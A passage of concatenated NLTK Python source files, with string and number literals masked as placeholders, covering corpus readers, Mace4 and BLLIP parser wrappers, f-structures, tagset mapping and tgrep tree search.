( self , root , self . _FILES ) <EOL> self . _tagset = tagset <EOL> def words ( self ) : <EOL> return StreamBackedCorpusView ( self . abspath ( '<STR_LIT>' ) , <EOL> self . _words_block_reader ) <EOL> def tagged_words ( self , tagset = None ) : <EOL> def tagged_words_block_reader ( stream ) : <EOL> return self . _tagged_words_block_reader ( stream , tagset ) <EOL> return StreamBackedCorpusView ( self . abspath ( '<STR_LIT>' ) , <EOL> tagged_words_block_reader ) <EOL> def turns ( self ) : <EOL> return StreamBackedCorpusView ( self . abspath ( '<STR_LIT>' ) , <EOL> self . _turns_block_reader ) <EOL> def tagged_turns ( self , tagset = None ) : <EOL> def tagged_turns_block_reader ( stream ) : <EOL> return self . _tagged_turns_block_reader ( stream , tagset ) <EOL> return StreamBackedCorpusView ( self . abspath ( '<STR_LIT>' ) , <EOL> tagged_turns_block_reader ) <EOL> def discourses ( self ) : <EOL> return StreamBackedCorpusView ( self . 
abspath ( '<STR_LIT>' ) , <EOL> self . _discourses_block_reader ) <EOL> def tagged_discourses ( self , tagset = False ) : <EOL> def tagged_discourses_block_reader ( stream ) : <EOL> return self . _tagged_discourses_block_reader ( stream , tagset ) <EOL> return StreamBackedCorpusView ( self . abspath ( '<STR_LIT>' ) , <EOL> tagged_discourses_block_reader ) <EOL> def _discourses_block_reader ( self , stream ) : <EOL> return [ [ self . _parse_utterance ( u , include_tag = False ) <EOL> for b in read_blankline_block ( stream ) <EOL> for u in b . split ( '<STR_LIT:\n>' ) if u . strip ( ) ] ] <EOL> def _tagged_discourses_block_reader ( self , stream , tagset = None ) : <EOL> return [ [ self . _parse_utterance ( u , include_tag = True , <EOL> tagset = tagset ) <EOL> for b in read_blankline_block ( stream ) <EOL> for u in b . split ( '<STR_LIT:\n>' ) if u . strip ( ) ] ] <EOL> def _turns_block_reader ( self , stream ) : <EOL> return self . _discourses_block_reader ( stream ) [ <NUM_LIT:0> ] <EOL> def _tagged_turns_block_reader ( self , stream , tagset = None ) : <EOL> return self . _tagged_discourses_block_reader ( stream , tagset ) [ <NUM_LIT:0> ] <EOL> def _words_block_reader ( self , stream ) : <EOL> return sum ( self . _discourses_block_reader ( stream ) [ <NUM_LIT:0> ] , [ ] ) <EOL> def _tagged_words_block_reader ( self , stream , tagset = None ) : <EOL> return sum ( self . _tagged_discourses_block_reader ( stream , <EOL> tagset ) [ <NUM_LIT:0> ] , [ ] ) <EOL> _UTTERANCE_RE = re . compile ( '<STR_LIT>' ) <EOL> _SEP = '<STR_LIT:/>' <EOL> def _parse_utterance ( self , utterance , include_tag , tagset = None ) : <EOL> m = self . _UTTERANCE_RE . match ( utterance ) <EOL> if m is None : <EOL> raise ValueError ( '<STR_LIT>' % utterance ) <EOL> speaker , id , text = m . groups ( ) <EOL> words = [ str2tuple ( s , self . _SEP ) for s in text . split ( ) ] <EOL> if not include_tag : <EOL> words = [ w for ( w , t ) in words ] <EOL> elif tagset and tagset != self . 
_tagset : <EOL> words = [ ( w , map_tag ( self . _tagset , tagset , t ) ) for ( w , t ) in words ] <EOL> return SwitchboardTurn ( words , speaker , id ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import os <EOL> import tempfile <EOL> from nltk . sem . logic import is_indvar <EOL> from nltk . sem import Valuation , Expression <EOL> from nltk . inference . api import ModelBuilder , BaseModelBuilderCommand <EOL> from nltk . inference . prover9 import Prover9CommandParent , Prover9Parent <EOL> class MaceCommand ( Prover9CommandParent , BaseModelBuilderCommand ) : <EOL> """<STR_LIT>""" <EOL> _interpformat_bin = None <EOL> def __init__ ( self , goal = None , assumptions = None , max_models = <NUM_LIT> , model_builder = None ) : <EOL> """<STR_LIT>""" <EOL> if model_builder is not None : <EOL> assert isinstance ( model_builder , Mace ) <EOL> else : <EOL> model_builder = Mace ( max_models ) <EOL> BaseModelBuilderCommand . __init__ ( self , model_builder , goal , assumptions ) <EOL> @ property <EOL> def valuation ( mbc ) : return mbc . model ( '<STR_LIT>' ) <EOL> def _convert2val ( self , valuation_str ) : <EOL> """<STR_LIT>""" <EOL> valuation_standard_format = self . _transform_output ( valuation_str , '<STR_LIT>' ) <EOL> val = [ ] <EOL> for line in valuation_standard_format . splitlines ( False ) : <EOL> l = line . strip ( ) <EOL> if l . startswith ( '<STR_LIT>' ) : <EOL> num_entities = int ( l [ l . index ( '<STR_LIT:(>' ) + <NUM_LIT:1> : l . index ( '<STR_LIT:U+002C>' ) ] . strip ( ) ) <EOL> elif l . startswith ( '<STR_LIT>' ) and l . find ( '<STR_LIT:_>' ) == - <NUM_LIT:1> : <EOL> name = l [ l . index ( '<STR_LIT:(>' ) + <NUM_LIT:1> : l . index ( '<STR_LIT:U+002C>' ) ] . strip ( ) <EOL> if is_indvar ( name ) : <EOL> name = name . upper ( ) <EOL> value = int ( l [ l . index ( '<STR_LIT:[>' ) + <NUM_LIT:1> : l . index ( '<STR_LIT:]>' ) ] . strip ( ) ) <EOL> val . append ( ( name , MaceCommand . _make_model_var ( value ) ) ) <EOL> elif l . startswith ( '<STR_LIT>' ) : <EOL> l = l [ l . index ( '<STR_LIT:(>' ) + <NUM_LIT:1> : ] <EOL> if '<STR_LIT:(>' in l : <EOL> name = l [ : l . 
index ( '<STR_LIT:(>' ) ] . strip ( ) <EOL> values = [ int ( v . strip ( ) ) for v in l [ l . index ( '<STR_LIT:[>' ) + <NUM_LIT:1> : l . index ( '<STR_LIT:]>' ) ] . split ( '<STR_LIT:U+002C>' ) ] <EOL> val . append ( ( name , MaceCommand . _make_relation_set ( num_entities , values ) ) ) <EOL> else : <EOL> name = l [ : l . index ( '<STR_LIT:U+002C>' ) ] . strip ( ) <EOL> value = int ( l [ l . index ( '<STR_LIT:[>' ) + <NUM_LIT:1> : l . index ( '<STR_LIT:]>' ) ] . strip ( ) ) <EOL> val . append ( ( name , value == <NUM_LIT:1> ) ) <EOL> return Valuation ( val ) <EOL> @ staticmethod <EOL> def _make_relation_set ( num_entities , values ) : <EOL> """<STR_LIT>""" <EOL> r = set ( ) <EOL> for position in [ pos for ( pos , v ) in enumerate ( values ) if v == <NUM_LIT:1> ] : <EOL> r . add ( tuple ( MaceCommand . _make_relation_tuple ( position , values , num_entities ) ) ) <EOL> return r <EOL> @ staticmethod <EOL> def _make_relation_tuple ( position , values , num_entities ) : <EOL> if len ( values ) == <NUM_LIT:1> : <EOL> return [ ] <EOL> else : <EOL> sublist_size = len ( values ) // num_entities <EOL> sublist_start = position // sublist_size <EOL> sublist_position = int ( position % sublist_size ) <EOL> sublist = values [ sublist_start * sublist_size : ( sublist_start + <NUM_LIT:1> ) * sublist_size ] <EOL> return [ MaceCommand . _make_model_var ( sublist_start ) ] + MaceCommand . 
_make_relation_tuple ( sublist_position , <EOL> sublist , <EOL> num_entities ) <EOL> @ staticmethod <EOL> def _make_model_var ( value ) : <EOL> """<STR_LIT>""" <EOL> letter = [ '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' , '<STR_LIT:d>' , '<STR_LIT:e>' , '<STR_LIT:f>' , '<STR_LIT:g>' , '<STR_LIT:h>' , '<STR_LIT:i>' , '<STR_LIT>' , '<STR_LIT:k>' , '<STR_LIT:l>' , '<STR_LIT:m>' , '<STR_LIT:n>' , <EOL> '<STR_LIT:o>' , '<STR_LIT:p>' , '<STR_LIT:q>' , '<STR_LIT:r>' , '<STR_LIT:s>' , '<STR_LIT:t>' , '<STR_LIT:u>' , '<STR_LIT:v>' , '<STR_LIT:w>' , '<STR_LIT:x>' , '<STR_LIT:y>' , '<STR_LIT:z>' ] [ value ] <EOL> num = value // <NUM_LIT> <EOL> return ( letter + str ( num ) if num > <NUM_LIT:0> else letter ) <EOL> def _decorate_model ( self , valuation_str , format ) : <EOL> """<STR_LIT>""" <EOL> if not format : <EOL> return valuation_str <EOL> elif format == '<STR_LIT>' : <EOL> return self . _convert2val ( valuation_str ) <EOL> else : <EOL> return self . _transform_output ( valuation_str , format ) <EOL> def _transform_output ( self , valuation_str , format ) : <EOL> """<STR_LIT>""" <EOL> if format in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return self . _call_interpformat ( valuation_str , [ format ] ) [ <NUM_LIT:0> ] <EOL> else : <EOL> raise LookupError ( "<STR_LIT>" ) <EOL> def _call_interpformat ( self , input_str , args = [ ] , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> if self . _interpformat_bin is None : <EOL> self . _interpformat_bin = self . _modelbuilder . _find_binary ( <EOL> '<STR_LIT>' , verbose ) <EOL> return self . _modelbuilder . _call ( input_str , self . _interpformat_bin , <EOL> args , verbose ) <EOL> class Mace ( Prover9Parent , ModelBuilder ) : <EOL> _mace4_bin = None <EOL> def __init__ ( self , end_size = <NUM_LIT> ) : <EOL> self . 
_end_size = end_size <EOL> """<STR_LIT>""" <EOL> def _build_model ( self , goal = None , assumptions = None , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> if not assumptions : <EOL> assumptions = [ ] <EOL> stdout , returncode = self . _call_mace4 ( self . prover9_input ( goal , assumptions ) , <EOL> verbose = verbose ) <EOL> return ( returncode == <NUM_LIT:0> , stdout ) <EOL> def _call_mace4 ( self , input_str , args = [ ] , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> if self . _mace4_bin is None : <EOL> self . _mace4_bin = self . _find_binary ( '<STR_LIT>' , verbose ) <EOL> updated_input_str = '<STR_LIT>' <EOL> if self . _end_size > <NUM_LIT:0> : <EOL> updated_input_str += '<STR_LIT>' % self . _end_size <EOL> updated_input_str += input_str <EOL> return self . _call ( updated_input_str , self . _mace4_bin , args , verbose ) <EOL> def spacer ( num = <NUM_LIT:30> ) : <EOL> print ( '<STR_LIT:->' * num ) <EOL> def decode_result ( found ) : <EOL> """<STR_LIT>""" <EOL> return { True : '<STR_LIT>' , False : '<STR_LIT>' , None : '<STR_LIT:None>' } [ found ] <EOL> def test_model_found ( arguments ) : <EOL> """<STR_LIT>""" <EOL> for ( goal , assumptions ) in arguments : <EOL> g = Expression . fromstring ( goal ) <EOL> alist = [ lp . parse ( a ) for a in assumptions ] <EOL> m = MaceCommand ( g , assumptions = alist , max_models = <NUM_LIT:50> ) <EOL> found = m . build_model ( ) <EOL> for a in alist : <EOL> print ( '<STR_LIT>' % a ) <EOL> print ( '<STR_LIT>' % ( g , decode_result ( found ) ) ) <EOL> def test_build_model ( arguments ) : <EOL> """<STR_LIT>""" <EOL> g = Expression . fromstring ( '<STR_LIT>' ) <EOL> alist = [ Expression . fromstring ( a ) for a in [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ] <EOL> m = MaceCommand ( g , assumptions = alist ) <EOL> m . 
build_model ( ) <EOL> spacer ( ) <EOL> print ( "<STR_LIT>" ) <EOL> spacer ( ) <EOL> for a in alist : <EOL> print ( '<STR_LIT>' % a ) <EOL> print ( '<STR_LIT>' % ( g , decode_result ( m . build_model ( ) ) ) ) <EOL> spacer ( ) <EOL> print ( "<STR_LIT>" ) <EOL> spacer ( ) <EOL> print ( m . valuation , '<STR_LIT:\n>' ) <EOL> def test_transform_output ( argument_pair ) : <EOL> """<STR_LIT>""" <EOL> g = Expression . fromstring ( argument_pair [ <NUM_LIT:0> ] ) <EOL> alist = [ lp . parse ( a ) for a in argument_pair [ <NUM_LIT:1> ] ] <EOL> m = MaceCommand ( g , assumptions = alist ) <EOL> m . build_model ( ) <EOL> for a in alist : <EOL> print ( '<STR_LIT>' % a ) <EOL> print ( '<STR_LIT>' % ( g , m . build_model ( ) ) ) <EOL> for format in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> spacer ( ) <EOL> print ( "<STR_LIT>" % format ) <EOL> spacer ( ) <EOL> print ( m . model ( format = format ) ) <EOL> def test_make_relation_set ( ) : <EOL> print ( MaceCommand . _make_relation_set ( num_entities = <NUM_LIT:3> , values = [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] ) == set ( [ ( '<STR_LIT:c>' , ) , ( '<STR_LIT:a>' , ) ] ) ) <EOL> print ( MaceCommand . _make_relation_set ( num_entities = <NUM_LIT:3> , values = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] ) == set ( [ ( '<STR_LIT:c>' , '<STR_LIT:a>' ) ] ) ) <EOL> print ( MaceCommand . 
_make_relation_set ( num_entities = <NUM_LIT:2> , values = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] ) == set ( [ ( '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:a>' ) , ( '<STR_LIT:b>' , '<STR_LIT:b>' , '<STR_LIT:a>' ) ] ) ) <EOL> arguments = [ <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> ] <EOL> def demo ( ) : <EOL> test_model_found ( arguments ) <EOL> test_build_model ( arguments ) <EOL> test_transform_output ( arguments [ <NUM_LIT:1> ] ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> demo ( ) </s>
<s>
from __future__ import print_function
from nltk.parse.api import ParserI
from nltk.tree import Tree
"""<STR_LIT>"""
__all__ = ['<STR_LIT>']
try:
    from bllipparser import RerankingParser
    from bllipparser.RerankingParser import get_unified_model_parameters

    # bllipparser imported successfully: the guard becomes a no-op.
    def _ensure_bllip_import_or_error():
        pass
except ImportError as ie:
    # Capture the ImportError as a default argument so the guard can
    # re-raise it lazily, at first use rather than at module import.
    def _ensure_bllip_import_or_error(ie=ie):
        raise ImportError("<STR_LIT>" % ie)


def _ensure_ascii(words):
    # NOTE(review): `word.decode('ascii')` is a Python 2 idiom; on Python 3
    # `str` has no .decode -- confirm which versions this file targets.
    try:
        for i, word in enumerate(words):
            word.decode('<STR_LIT:ascii>')
    except UnicodeDecodeError:
        # `i` and `word` identify the first offending token.
        raise ValueError("<STR_LIT>"
                         "<STR_LIT>" %
                         (i, word))


def _scored_parse_to_nltk_tree(scored_parse):
    # Bridge: render the BLLIP parse as PTB text, re-read it as an nltk Tree.
    return Tree.fromstring(str(scored_parse.ptb_parse))


class BllipParser(ParserI):
    """<STR_LIT>"""

    def __init__(self, parser_model=None, reranker_features=None,
                 reranker_weights=None, parser_options=None,
                 reranker_options=None):
        """<STR_LIT>"""
        _ensure_bllip_import_or_error()
        parser_options = parser_options or {}
        reranker_options = reranker_options or {}
        self.rrp = RerankingParser()
        self.rrp.load_parser_model(parser_model, **parser_options)
        # The reranker is optional: it is loaded only when both a feature
        # file and a weights file are supplied.
        if reranker_features and reranker_weights:
            self.rrp.load_reranker_model(features_filename=reranker_features,
                                         weights_filename=reranker_weights,
                                         **reranker_options)

    def parse(self, sentence):
        """<STR_LIT>"""
        # Generator over the n-best parses, best first.
        _ensure_ascii(sentence)
        nbest_list = self.rrp.parse(sentence)
        for scored_parse in nbest_list:
            yield _scored_parse_to_nltk_tree(scored_parse)

    def tagged_parse(self, word_and_tag_pairs):
        """<STR_LIT>"""
        # Split the pairs into the word sequence and a position->tag map;
        # a None tag leaves that position unconstrained.
        words = []
        tag_map = {}
        for i, (word, tag) in enumerate(word_and_tag_pairs):
            words.append(word)
            if tag is not None:
                tag_map[i] = tag
        _ensure_ascii(words)
        nbest_list = self.rrp.parse_tagged(words, tag_map)
        for scored_parse in nbest_list:
            yield _scored_parse_to_nltk_tree(scored_parse)

    @classmethod
    def from_unified_model_dir(this_class, model_dir, parser_options=None,
                               reranker_options=None):
        """<STR_LIT>"""
        # Alternate constructor: resolve parser/reranker paths from a
        # unified model directory layout.
        (parser_model_dir, reranker_features_filename,
         reranker_weights_filename) = get_unified_model_parameters(model_dir)
        return this_class(parser_model_dir, reranker_features_filename,
                          reranker_weights_filename, parser_options,
                          reranker_options)


def demo():
    """<STR_LIT>"""
    from nltk.data import find
    model_dir = find('<STR_LIT>').path
    print('<STR_LIT>')
    bllip = BllipParser.from_unified_model_dir(model_dir)
    print('<STR_LIT>')
    sentence1 = '<STR_LIT>'.split()
    sentence2 = '<STR_LIT>'.split()
    fail1 = '<STR_LIT>'.split()
    for sentence in (sentence1, sentence2, fail1):
        print('<STR_LIT>' % '<STR_LIT:U+0020>'.join(sentence))
        try:
            tree = next(bllip.parse(sentence))
            print(tree)
        except StopIteration:
            # No parse found for this sentence.
            print("<STR_LIT>")
    for i, parse in enumerate(bllip.parse(sentence1)):
        print('<STR_LIT>' % (i, parse))
    # Tagged parsing: None leaves a token's tag unconstrained.
    print("<STR_LIT>",
          next(bllip.tagged_parse([('<STR_LIT:A>', None), ('<STR_LIT>', '<STR_LIT>')])))
    print("<STR_LIT>",
          next(bllip.tagged_parse([('<STR_LIT:A>', '<STR_LIT>'), ('<STR_LIT>', '<STR_LIT>')])))
    print("<STR_LIT>",
          next(bllip.tagged_parse([('<STR_LIT:A>', '<STR_LIT>'), ('<STR_LIT>', None)])))


def setup_module(module):
    # Nose hook: skip this module's tests when bllipparser is unavailable.
    from nose import SkipTest
    try:
        _ensure_bllip_import_or_error()
    except ImportError:
        raise SkipTest('<STR_LIT>'
                       '<STR_LIT>')
</s>
<s> from __future__ import print_function , division , unicode_literals <EOL> from nltk . internals import Counter <EOL> from nltk . compat import python_2_unicode_compatible <EOL> @ python_2_unicode_compatible <EOL> class FStructure ( dict ) : <EOL> def safeappend ( self , key , item ) : <EOL> """<STR_LIT>""" <EOL> if key not in self : <EOL> self [ key ] = [ ] <EOL> self [ key ] . append ( item ) <EOL> def __setitem__ ( self , key , value ) : <EOL> dict . __setitem__ ( self , key . lower ( ) , value ) <EOL> def __getitem__ ( self , key ) : <EOL> return dict . __getitem__ ( self , key . lower ( ) ) <EOL> def __contains__ ( self , key ) : <EOL> return dict . __contains__ ( self , key . lower ( ) ) <EOL> def to_glueformula_list ( self , glue_dict ) : <EOL> depgraph = self . to_depgraph ( ) <EOL> return glue_dict . to_glueformula_list ( depgraph ) <EOL> def to_depgraph ( self , rel = None ) : <EOL> from nltk . parse . dependencygraph import DependencyGraph <EOL> depgraph = DependencyGraph ( ) <EOL> nodes = depgraph . nodes <EOL> self . _to_depgraph ( nodes , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> for address , node in nodes . items ( ) : <EOL> for n2 in ( n for n in nodes . values ( ) if n [ '<STR_LIT>' ] != '<STR_LIT>' ) : <EOL> if n2 [ '<STR_LIT>' ] == address : <EOL> relation = n2 [ '<STR_LIT>' ] <EOL> node [ '<STR_LIT>' ] . setdefault ( relation , [ ] ) <EOL> node [ '<STR_LIT>' ] [ relation ] . append ( n2 [ '<STR_LIT:address>' ] ) <EOL> depgraph . root = nodes [ <NUM_LIT:1> ] <EOL> return depgraph <EOL> def _to_depgraph ( self , nodes , head , rel ) : <EOL> index = len ( nodes ) <EOL> nodes [ index ] . update ( <EOL> { <EOL> '<STR_LIT:address>' : index , <EOL> '<STR_LIT>' : self . pred [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : self . pred [ <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : head , <EOL> '<STR_LIT>' : rel , <EOL> } <EOL> ) <EOL> for feature in sorted ( self ) : <EOL> for item in sorted ( self [ feature ] ) : <EOL> if isinstance ( item , FStructure ) : <EOL> item . 
_to_depgraph ( nodes , index , feature ) <EOL> elif isinstance ( item , tuple ) : <EOL> new_index = len ( nodes ) <EOL> nodes [ new_index ] . update ( <EOL> { <EOL> '<STR_LIT:address>' : new_index , <EOL> '<STR_LIT>' : item [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : item [ <NUM_LIT:1> ] , <EOL> '<STR_LIT>' : index , <EOL> '<STR_LIT>' : feature , <EOL> } <EOL> ) <EOL> elif isinstance ( item , list ) : <EOL> for n in item : <EOL> n . _to_depgraph ( nodes , index , feature ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' % feature ) <EOL> @ staticmethod <EOL> def read_depgraph ( depgraph ) : <EOL> return FStructure . _read_depgraph ( depgraph . root , depgraph ) <EOL> @ staticmethod <EOL> def _read_depgraph ( node , depgraph , label_counter = None , parent = None ) : <EOL> if not label_counter : <EOL> label_counter = Counter ( ) <EOL> if node [ '<STR_LIT>' ] . lower ( ) in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> return ( node [ '<STR_LIT>' ] , node [ '<STR_LIT>' ] ) <EOL> else : <EOL> fstruct = FStructure ( ) <EOL> fstruct . pred = None <EOL> fstruct . label = FStructure . _make_label ( label_counter . get ( ) ) <EOL> fstruct . parent = parent <EOL> word , tag = node [ '<STR_LIT>' ] , node [ '<STR_LIT>' ] <EOL> if tag [ : <NUM_LIT:2> ] == '<STR_LIT>' : <EOL> if tag [ <NUM_LIT:2> : <NUM_LIT:3> ] == '<STR_LIT:D>' : <EOL> fstruct . safeappend ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> fstruct . pred = ( word , tag [ : <NUM_LIT:2> ] ) <EOL> if not fstruct . pred : <EOL> fstruct . pred = ( word , tag ) <EOL> children = [ depgraph . nodes [ idx ] for idx in sum ( list ( node [ '<STR_LIT>' ] . values ( ) ) , [ ] ) ] <EOL> for child in children : <EOL> fstruct . safeappend ( child [ '<STR_LIT>' ] , FStructure . 
_read_depgraph ( child , depgraph , label_counter , fstruct ) ) <EOL> return fstruct <EOL> @ staticmethod <EOL> def _make_label ( value ) : <EOL> """<STR_LIT>""" <EOL> letter = [ '<STR_LIT:f>' , '<STR_LIT:g>' , '<STR_LIT:h>' , '<STR_LIT:i>' , '<STR_LIT>' , '<STR_LIT:k>' , '<STR_LIT:l>' , '<STR_LIT:m>' , '<STR_LIT:n>' , '<STR_LIT:o>' , '<STR_LIT:p>' , '<STR_LIT:q>' , '<STR_LIT:r>' , '<STR_LIT:s>' , <EOL> '<STR_LIT:t>' , '<STR_LIT:u>' , '<STR_LIT:v>' , '<STR_LIT:w>' , '<STR_LIT:x>' , '<STR_LIT:y>' , '<STR_LIT:z>' , '<STR_LIT:a>' , '<STR_LIT:b>' , '<STR_LIT:c>' , '<STR_LIT:d>' , '<STR_LIT:e>' ] [ value - <NUM_LIT:1> ] <EOL> num = int ( value ) // <NUM_LIT> <EOL> if num > <NUM_LIT:0> : <EOL> return letter + str ( num ) <EOL> else : <EOL> return letter <EOL> def __repr__ ( self ) : <EOL> return self . __unicode__ ( ) . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> def __str__ ( self ) : <EOL> return self . pretty_format ( ) <EOL> def pretty_format ( self , indent = <NUM_LIT:3> ) : <EOL> try : <EOL> accum = '<STR_LIT>' % self . label <EOL> except NameError : <EOL> accum = '<STR_LIT:[>' <EOL> try : <EOL> accum += '<STR_LIT>' % ( self . pred [ <NUM_LIT:0> ] ) <EOL> except NameError : <EOL> pass <EOL> for feature in sorted ( self ) : <EOL> for item in self [ feature ] : <EOL> if isinstance ( item , FStructure ) : <EOL> next_indent = indent + len ( feature ) + <NUM_LIT:3> + len ( self . label ) <EOL> accum += '<STR_LIT>' % ( '<STR_LIT:U+0020>' * ( indent ) , feature , item . pretty_format ( next_indent ) ) <EOL> elif isinstance ( item , tuple ) : <EOL> accum += '<STR_LIT>' % ( '<STR_LIT:U+0020>' * ( indent ) , feature , item [ <NUM_LIT:0> ] ) <EOL> elif isinstance ( item , list ) : <EOL> accum += '<STR_LIT>' % ( '<STR_LIT:U+0020>' * ( indent ) , feature , ( '<STR_LIT>' % ( '<STR_LIT:U+0020>' * ( indent + len ( feature ) + <NUM_LIT:2> ) ) ) . 
join ( item ) ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' % feature ) <EOL> return accum + '<STR_LIT:]>' <EOL> def demo_read_depgraph ( ) : <EOL> from nltk . parse . dependencygraph import DependencyGraph <EOL> dg1 = DependencyGraph ( """<STR_LIT>""" ) <EOL> dg2 = DependencyGraph ( """<STR_LIT>""" ) <EOL> dg3 = DependencyGraph ( """<STR_LIT>""" ) <EOL> dg4 = DependencyGraph ( """<STR_LIT>""" ) <EOL> depgraphs = [ dg1 , dg2 , dg3 , dg4 ] <EOL> for dg in depgraphs : <EOL> print ( FStructure . read_depgraph ( dg ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> demo_read_depgraph ( ) </s>
<s>
"""<STR_LIT>"""
# NOTE(review): literals in this corpus segment are abstracted to <STR_LIT>/<NUM_LIT>
# placeholder tokens; code tokens are preserved as-is, only formatting/comments added.
from __future__ import print_function, unicode_literals, division
from collections import defaultdict
from os.path import join
from nltk.data import load

_UNIVERSAL_DATA = "<STR_LIT>"
_UNIVERSAL_TAGS = ('<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT:X>', '<STR_LIT:.>')

# Three-level lazy mapping: source tagset -> target tagset -> source tag
# -> target tag.  Unknown levels materialize on access via defaultdict.
_MAPPINGS = defaultdict(lambda: defaultdict(lambda: defaultdict(lambda: '<STR_LIT>')))


def _load_universal_map(fileid):
    # Load a two-column (fine \t coarse) mapping file and populate _MAPPINGS.
    contents = load(join(_UNIVERSAL_DATA, fileid + '<STR_LIT>'), format="<STR_LIT:text>")
    # Fine-grained tags absent from the file fall back to the default tag
    # installed here (presumably the universal 'X' tag — TODO confirm,
    # literal is masked in this corpus).
    _MAPPINGS[fileid]['<STR_LIT>'].default_factory = lambda: '<STR_LIT:X>'
    for line in contents.splitlines():
        line = line.strip()
        if line == '<STR_LIT>':
            continue
        fine, coarse = line.split('<STR_LIT:\t>')
        # Sanity-check: the coarse tag must be a known universal tag, and a
        # fine tag may only be mapped once per source tagset.
        assert coarse in _UNIVERSAL_TAGS, '<STR_LIT>'.format(coarse)
        assert fine not in _MAPPINGS[fileid]['<STR_LIT>'], '<STR_LIT>'.format(fine)
        _MAPPINGS[fileid]['<STR_LIT>'][fine] = coarse


def tagset_mapping(source, target):
    """<STR_LIT>"""
    # Lazily load the mapping file on first request for this (source, target).
    if source not in _MAPPINGS or target not in _MAPPINGS[source]:
        if target == '<STR_LIT>':
            _load_universal_map(source)
    return _MAPPINGS[source][target]


def map_tag(source, target, source_tag):
    """<STR_LIT>"""
    # Normalize alias names for the source tagset before looking up.
    if target == '<STR_LIT>':
        if source == '<STR_LIT>':
            source = '<STR_LIT>'
        if source == '<STR_LIT>':
            source = '<STR_LIT>'
    return tagset_mapping(source, target)[source_tag]
</s>
<s>
from __future__ import absolute_import


def setup_module(module):
    # nose hook: skip this test module entirely when numpy is not installed.
    from nose import SkipTest
    try:
        import numpy
    except ImportError:
        raise SkipTest("<STR_LIT>")
</s>
<s>
'''<STR_LIT>'''
# NOTE(review): literals in this corpus segment are abstracted to <STR_LIT>/<NUM_LIT>
# placeholder tokens; code tokens are preserved as-is, only formatting/comments added.
# This is NLTK's tgrep implementation: each parse action compiles a piece of a
# tgrep pattern into a predicate ``f(n, m, l)`` where ``n`` is a tree node,
# ``m`` a macro dictionary, and ``l`` a node-label dictionary.
from __future__ import absolute_import, print_function, unicode_literals
from nltk.compat import binary_type, text_type
import functools
import nltk.tree
try:
    import pyparsing
except ImportError:
    print('<STR_LIT>')
    print('<STR_LIT>')
import re


class TgrepException(Exception):
    '''<STR_LIT>'''
    pass


def ancestors(node):
    '''<STR_LIT>'''
    results = []
    # Nodes without a parent() method (plain strings/leaves) have no ancestors.
    try:
        current = node.parent()
    except AttributeError:
        return results
    while current:
        results.append(current)
        current = current.parent()
    return results


def unique_ancestors(node):
    '''<STR_LIT>'''
    results = []
    try:
        current = node.parent()
    except AttributeError:
        return results
    # Only walk up through ancestors that have exactly one child.
    while current and len(current) == <NUM_LIT:1>:
        results.append(current)
        current = current.parent()
    return results


def _descendants(node):
    '''<STR_LIT>'''
    try:
        treepos = node.treepositions()
    except AttributeError:
        return []
    # Skip position () which is the node itself.
    return [node[x] for x in treepos[<NUM_LIT:1>:]]


def _leftmost_descendants(node):
    '''<STR_LIT>'''
    try:
        treepos = node.treepositions()
    except AttributeError:
        return []
    # A position of all zeros is on the leftmost spine.
    return [node[x] for x in treepos[<NUM_LIT:1>:] if all(y == <NUM_LIT:0> for y in x)]


def _rightmost_descendants(node):
    '''<STR_LIT>'''
    try:
        rightmost_leaf = max(node.treepositions())
    except AttributeError:
        return []
    # Every prefix of the max (lexicographically last) position lies on the
    # rightmost spine.
    return [node[rightmost_leaf[:i]] for i in range(<NUM_LIT:1>, len(rightmost_leaf) + <NUM_LIT:1>)]


def _istree(obj):
    '''<STR_LIT>'''
    return isinstance(obj, nltk.tree.Tree)


def _unique_descendants(node):
    '''<STR_LIT>'''
    results = []
    current = node
    # Descend while each node has exactly one child.
    while current and _istree(current) and len(current) == <NUM_LIT:1>:
        current = current[<NUM_LIT:0>]
        results.append(current)
    return results


def _before(node):
    '''<STR_LIT>'''
    try:
        pos = node.treeposition()
        tree = node.root()
    except AttributeError:
        return []
    # Tree positions strictly to the left of pos.
    return [tree[x] for x in tree.treepositions()
            if x[:len(pos)] < pos[:len(x)]]


def _immediately_before(node):
    '''<STR_LIT>'''
    try:
        pos = node.treeposition()
        tree = node.root()
    except AttributeError:
        return []
